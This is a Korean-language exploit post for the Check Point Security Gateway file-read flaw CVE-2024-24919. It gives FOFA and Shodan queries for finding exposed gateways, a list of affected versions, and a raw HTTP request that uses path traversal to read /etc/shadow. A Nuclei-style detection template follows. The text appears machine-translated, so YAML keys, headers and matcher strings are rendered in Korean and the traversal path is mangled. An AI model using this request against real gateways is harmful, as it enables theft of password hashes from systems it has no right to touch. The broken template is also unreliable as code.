체크포인트 보안 게이트웨이 임의 파일 읽기 취약점(CVE-2024-24919)
설명
Check Point 보안 게이트웨이 Check Point Software의 네트워크 보안 솔루션 제품군입니다. 차세대 방화벽(NGFW), 데이터 센터 보안 게이트웨이 및 AI 기반 퀀텀 게이트웨이를 포함하는 이러한 솔루션은 조직에 복잡한 사이버 위협에 대한 고급 보호 기능을 제공하도록 설계되었습니다. 통합 위협 보호, 통합 보안 관리 및 정책 제어를 통해 네트워크, 클라우드, 모바일 및 엔드포인트를 보호합니다.
fofa
icon_hash="1440532452″
영향을 받는 버전
Check Point 보안 게이트웨이 R77.20(EOL)
Check Point 보안 게이트웨이 R77.30(EOL)
Check Point 보안 게이트웨이 R80.10(EOL)
Check Point 보안 게이트웨이 R80.20(EOL)
Check Point 보안 게이트웨이 R80.20.x
Check Point 보안 게이트웨이 R80.20SP(EOL)
Check Point 보안 게이트웨이 R80.30(EOL)
Check Point 보안 게이트웨이 R80.30SP(EOL)
Check Point 보안 게이트웨이 R80.40(EOL)
Check Point 보안 게이트웨이 R81
Check Point 보안 게이트웨이 R81.10
Check Point 보안 게이트웨이 R81.10.x
Check Point 보안 게이트웨이 R81.20
poc
POST /clients/MyCRL HTTP/1.1
호스트: IP
콘텐츠 길이: 39aCSHELL/... /... /... /... /... /... /... /etc/shadow
poc yaml
ID: CVE-2024-24919
정보.
이름: 체크 포인트 퀀텀 게이트웨이 - 정보 공개
저자: johnk3r
심각도: 높음
설명: |
CVE-2024-24919는 공격자가 인터넷에 연결된 게이트웨이에서 특정 정보에 액세스할 수 있는 정보 공개 취약점입니다. 의 특정 정보에 액세스할 수 있는 취약점입니다.
참조.
- https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
- https://support.checkpoint.com/results/sk/sk182337
메타데이터.
최대 요청: 1
공급업체: 체크포인트
제품: 퀀텀_보안_게이트웨이
CPE: CPE:2.3:H:체크포인트:퀀텀_보안_게이트웨이:*:*:*:*:*:*:*:*:*:*:*:*:*:*:*
쇼단 쿼리: html: "체크포인트 SSL 네트워크"
확인됨: true
태그: CVE, CVE2024, 체크포인트, LFPhttp.
- raw.
– |
POST /clients/MyCRL HTTP/1.1
호스트: {{호스트이름}}aCSHELL/... /... /... /... /... /... /... /etc/shadow
일치 조건: 및
매처.
- 유형: 정규식
부분: 본문
정규식.
- "root:"
- "아무도:"
조건: 및- 유형: 상태
상태.
– 200